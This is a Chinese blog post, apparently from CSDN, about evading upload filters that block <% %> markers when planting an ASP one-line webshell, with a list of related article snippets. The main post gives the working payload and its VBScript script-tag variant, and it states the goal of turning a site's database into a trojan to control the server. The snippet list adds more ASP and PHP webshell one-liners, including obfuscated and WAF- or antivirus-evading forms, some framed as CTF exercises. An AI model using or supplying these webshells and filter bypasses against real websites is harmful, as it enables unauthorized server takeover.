一句话木马中突破〈%%〉标记过滤

最新推荐文章于 2023-12-21 13:33:26 发布
原创 最新推荐文章于 2023-12-21 13:33:26 发布 · 917 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#asp #数据库 #服务器 #shell

本文介绍了一种技巧,通过更改ASP木马代码中的标签,使其能够绕过某些网页程序对〈%%〉符号的限制,成功上传并执行。
 很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是“<%execute request("l")%>", 我们可以把它的标签换下来。

然后改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".。

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。
HackCode
关注
不安全的文件上传基本原理(Unsafe file upload)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-17 3949
不安全的文件上传基本原理(File upload vulnerabilities) 什么是文件上传漏洞? 常用1句话(密码全为1) Godzilla YYDS Raw or Base64 加密器区别 生成的面杀shell对比 pikachu clientcheck servercheck getimagesize cmd 合成图片马 exiftool dvwa Low Level Medium Level High Level Impossible Level PortSwigger 通过 .htacces
句话木马及几种可绕过过滤格式
收集盒 Book box
04-12 4075
<br /><br />ASP句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
上传句话木马时<? php被过滤的解决办法
ancan8807的博客
09-15 3430
i春秋“百度杯”CTF比赛 九月场 web题 upload 题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中 打开题目发现 于是想到通过上传句话木马进入后台 上传句话木马 <?phpeval($_POST['ant']);?> 提示上传成功,查看网页源代码提示 php文件上传到u/antsword.php...
句话木马<?php过滤
RAFANra的博客
04-26 4089
<?php过滤方法 打开题目显示flag在/var/www/html/flag.php 用图片合成句话木马上传 上传成功之后点开发现我的<?php被过滤了 ![在这里插入图片 发现<?php被过滤。上百度去搜下,发现大佬提出的建议使用: <scirpt language="pHp">@eval(['ios'])</script> 于是上传新马,成功挂马 得到flag ...
php句话图片木马过滤_php句话图片木马怎么解析
weixin_34580002的博客
03-08 1902
句话木马解析首先,学习渗透时,木马大概也就三种:大马、小马、句话。常见的句话:这个应该是最常见的了...看下他的组成.首先是个eval函数,其次是post提交个参数为x的值.首先我们看看eval函数是干什么的。官方说明:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NUL...
php句话图片木马过滤_php句话木马和图片木马的运行方法
weixin_31485835的博客
03-08 2618
标准的写法,直接通过eval执行php代码,如下:@eval($_POST['code']);动态执行assert生成木马文件(隐藏性最好的种)如下:@$_GET['a']($_GET['code']);使用方法:从url中传入下面参数执行后会在当前目录生成个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base64...
简单的句话木马免杀
2301_77927094的博客
12-21 1962
是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的句话木马能被低版本的D盾直接扫出,所以免杀必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查杀。必需,规定在字符串的何处开始替换。
这是句话木马<%execute request("value")%>,请详细解释
05-25
具体来说,这句话中的<% %>是ASP代码注入的标记,其中execute request("value")是要执行的恶意代码。如果Web应用程序存在漏洞,攻击者可以控制value参数的值,从而实现对Web应用程序的控制。因此,应该避免将任何...
ctf比赛中如何在只能上传.jpg后缀的情况下上传句话木马
01-20
由于某些Web服务器仅检查最后个扩展名以决定如何处理请求中的资源,因此即使存在额外的有效图片格式标记(如`.jpg`),也可能会执行嵌入其中的PHP脚本逻辑。 对于特定于`.jpg`的情况,则可尝试构造形似`malicious...
4.什么是PHP句话木马?简述其主要功能,并举个具体代码示例说明其工作方式
最新发布
09-14
句话木马通常隐藏在哪些类型的文件中? 注意:引用标记的使用。在提到客户端发送代码执行时,参考了引用[1]中关于eval和Request.form的解释(虽然它是ASP的,但原理类似)。在代码示例上参考引用[2],在防御上...
Web木马与文件上传漏洞
weixin_62707591的博客
06-20 4076
目录 、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 句话木马 1.4.2 大马小马 二、初识文件上传漏洞 2.1 文件上传漏洞的概念 2.2 文件上传漏洞的危害 2.2.1 非授权用户的越
Web安全-句话木马
热门推荐
道阻且长,行则将至
05-08 39万+
在很多的渗透过程中,渗透人员会上传句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么句话木马到底是什么呢?
句话木马绕WAF(小宇特详解)
小宇的web博客
04-08 3560
webshell绕过WAF 常见的PHP句话木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先尝试 <?php eval?> 发现没有拦截 然后尝试 <?php eval($_REQUEST[]);?> 发现拦截了,去掉中括号,发现不拦截了。 这里过滤了[] =>替换eval 替换$_REQUEST[a]=>超全局变量 这里利用了个php函数end end函
详谈句话木马的套路
qq_41679358的博客
03-31 682
0×01 前言 尽最大努力在文中让大家掌握些有用的 WEBSHELL 免杀技巧。 0×02 关于 eval 于 assert 关于 eval 函数在 php 给出的官方说明是 eval 是个语言构造器而不是个函数,不能被 可变函数 调用 可变函数:通过个变量,获取其对应的变量值,然后通过给该值增加个括号 (),让系统认为该值是个函数,从而当做函数来执行 通俗的说比如你 这样是不行的...
句话***中突破%%标记过滤
weixin_33690963的博客
08-31 214
突破%%标记过滤很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为ASP***,然后进步***控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%标记符号的内容的文件上传。这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP***为例。原来的程序代码是“〈%execute request("l")%...
<%%>用法初步认识
weixin_30390075的博客
12-16 498
<%%>是用于向客户端插入服务器代码所使用的标记 例如为了在HTML页面上展示由服务器提供的当前用户的某条信息或名字等便可使用 前台 <a href="home.aspx"><%=Name()%>的个人主页</a> 后台 public string Name() { try {...
php符号漏洞,剖析PHP纯符号句话webshell的代码
weixin_30260621的博客
03-13 321
复制代码代码如下:$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");${'_'.$_}['_'](${'_'.$_}['__']);?>以上是网上流传的段由纯符号组成的句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。第行:$_="";定义个...
php句话上传饶过,句话上传,绕过前端上传句话木马怎么操作(比如通过图片)...
weixin_31349405的博客
03-20 981
绕过前端上传句话木马怎么操作(比如通过图片)没见过这种方式,因为现在后台的人都学精了,上传的东西格式都是有严格要求的,传的东西要是通不过验证人家根本不理你的。php句话木马上传时...
html文件中<%%>、<%=%>、<%:%>各是什么意思
z1093541823的博客
05-18 5486
在阅读源码的时候,我们经常会发现这种写法 或者这种写法 然而这种写法并不是很常见,当我们不了解他的意思及使用方法时,我们阅读代码就会变得晦涩难懂,那么,他们到底代表什么意思呢? <%这里可以写程序语言,如C#后台程序%>, <%=这里可以取到后台非私有的变量值%> ===================================================== <%%>之间可以写服务器端代码,比如 <% for(var i=0;i&lt.
探索句话木马技术及其实现方式
文件列表中的“句话木马.txt”表明这个资源可能是以文本格式提供的,内容可能包括句话木马的技术细节、示例代码、使用方法或者防范建议等。文本文件广泛用于记录和分享信息,因为它们容易编辑、阅读且不需要特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值